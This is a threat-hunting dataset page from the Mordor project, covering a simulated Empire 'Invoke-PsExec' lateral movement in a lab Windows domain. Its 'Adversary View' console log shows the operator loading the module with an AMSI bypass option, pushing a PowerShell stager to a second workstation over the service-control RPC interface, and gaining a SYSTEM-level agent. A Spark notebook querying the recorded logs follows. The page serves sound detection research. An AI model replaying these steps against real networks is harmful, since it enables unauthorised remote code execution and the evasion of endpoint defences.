Empire Invoke PsExec

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2019/05/18

Modification Date

2020/09/20

Tactics

[‘TA0002’, ‘TA0008’]

Techniques

[‘T1021’]

Tags

[‘RPC CreateService’, ‘RPC StartService’, ‘TCP Svcctl’]

Dataset Description

This dataset represents adversaries remotely creating and starting a service via RPC methods over TCP.

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author

Name

Link

Simulation Plan

Environment

Tool Type

Module

Mordor shire

C2

lateral_movement

Adversary View

(Empire: stager/multi/launcher) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
A7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            
HBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            
UF5MYK42 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         6404   5/0.0    2020-09-20 16:13:06  http            


(Empire: agents) > interact UF5MYK42
(Empire: UF5MYK42) > usemodule lateral_movement/invoke_psexec
(Empire: powershell/lateral_movement/invoke_psexec) > set Listener http
(Empire: powershell/lateral_movement/invoke_psexec) > execute
(Empire: powershell/lateral_movement/invoke_psexec) > set ComputerName WORKSTATION6.theshire.local
(Empire: powershell/lateral_movement/invoke_psexec) > info

              Name: Invoke-PsExec
            Module: powershell/lateral_movement/invoke_psexec
        NeedsAdmin: False
        OpsecSafe: False
          Language: powershell
MinLanguageVersion: 2
        Background: True
  OutputExtension: None

Authors:
  @harmj0y

Description:
  Executes a stager on remote hosts using PsExec type
  functionality.

Comments:
  https://github.com/rapid7/metasploit-
  framework/blob/master/tools/psexec.rb

Options:

  Name             Required    Value                     Description
  ----             --------    -------                   -----------
  Agent            True        UF5MYK42                  Agent to run module on.                 
  Listener         False                                 Listener to use.                        
  Obfuscate        False       False                     Switch. Obfuscate the launcher          
                                                        powershell code, uses the               
                                                        ObfuscateCommand for obfuscation types. 
                                                        For powershell only.                    
  ObfuscateCommand False       Token\All\1               The Invoke-Obfuscation command to use.  
                                                        Only used if Obfuscate switch is True.  
                                                        For powershell only.                    
  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in 
                                                        the stager code.                        
  AMSIBypass2      False       False                     Include Tal Liberman's AMSI Bypass in   
                                                        the stager code.                        
  ComputerName     True        ComputerName WORKSTATION6.theshire.local Host to execute the stager on.          
  ServiceName      True        Updater                   The name of the service to create.      
  Command          False                                 Custom command to execute on remote     
                                                        hosts.                                  
  ResultFile       False                                 Name of the file to write the results to
                                                        on agent machine.                       
  UserAgent        False       default                   User-agent string to use for the staging
                                                        request (default, none, or other).      
  Proxy            False       default                   Proxy to use for request (default, none,
                                                        or other).                              
  ProxyCreds       False       default                   Proxy credentials                       
                                                        ([domain\]username:password) to use for 
                                                        request (default, none, or other).      

(Empire: powershell/lateral_movement/invoke_psexec) > execute
[>] Module is not opsec safe, run? [y/N] y
[*] Tasked UF5MYK42 to run TASK_CMD_JOB
[*] Agent UF5MYK42 tasked with task ID 1
[*] Tasked agent UF5MYK42 to run module powershell/lateral_movement/invoke_psexec
(Empire: powershell/lateral_movement/invoke_psexec) > 
Job started: RNU5DY

[*] Sending POWERSHELL stager (stage 1) to 172.18.39.6

[*] New agent 9CMNYX72 checked in
[+] Initial agent 9CMNYX72 from 172.18.39.6 now active (Slack)
[*] Sending agent (stage 2) to 9CMNYX72 at 172.18.39.6

(Empire: powershell/lateral_movement/invoke_psexec) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
A7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            
HBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            
UF5MYK42 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         6404   5/0.0    2020-09-20 16:17:06  http            

9CMNYX72 ps 172.18.39.6     WORKSTATION6      *THESHIRE\SYSTEM        powershell         4312   5/0.0    2020-09-20 16:17:08  http            

(Empire: agents) > interact 9CMNYX72
(Empire: 9CMNYX72) > shell whoami
[*] Tasked 9CMNYX72 to run TASK_SHELL
[*] Agent 9CMNYX72 tasked with task ID 1
(Empire: 9CMNYX72) > 
nt authority\system

..Command execution completed.

(Empire: 9CMNYX72) > back

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/lateral_movement/host/empire_psexec_dcerpc_tcp_svcctl.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+----------------------------------------+-------+-----+
|Hostname                   |Channel                                 |EventID|count|
+---------------------------+----------------------------------------+-------+-----+
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |1144 |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |596  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |351  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |347  |
|WORKSTATION5.theshire.local|Windows PowerShell                      |800    |255  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |13     |229  |
|WORKSTATION5.theshire.local|Microsoft-Windows-PowerShell/Operational|4103   |224  |
|WORKSTATION6               |Windows PowerShell                      |800    |169  |
|WORKSTATION6.theshire.local|Microsoft-Windows-PowerShell/Operational|4103   |126  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |122  |
|WORKSTATION6.theshire.local|security                                |4658   |111  |
|WORKSTATION6.theshire.local|security                                |4656   |58   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |13     |58   |
|WORKSTATION6.theshire.local|security                                |4690   |56   |
|MORDORDC.theshire.local    |Security                                |5156   |39   |
|WORKSTATION6.theshire.local|security                                |4663   |38   |
|WORKSTATION6.theshire.local|security                                |5158   |36   |
|WORKSTATION6.theshire.local|security                                |4703   |30   |
|MORDORDC.theshire.local    |Security                                |5158   |28   |
|WORKSTATION5.theshire.local|Security                                |5158   |27   |
+---------------------------+----------------------------------------+-------+-----+
only showing top 20 rows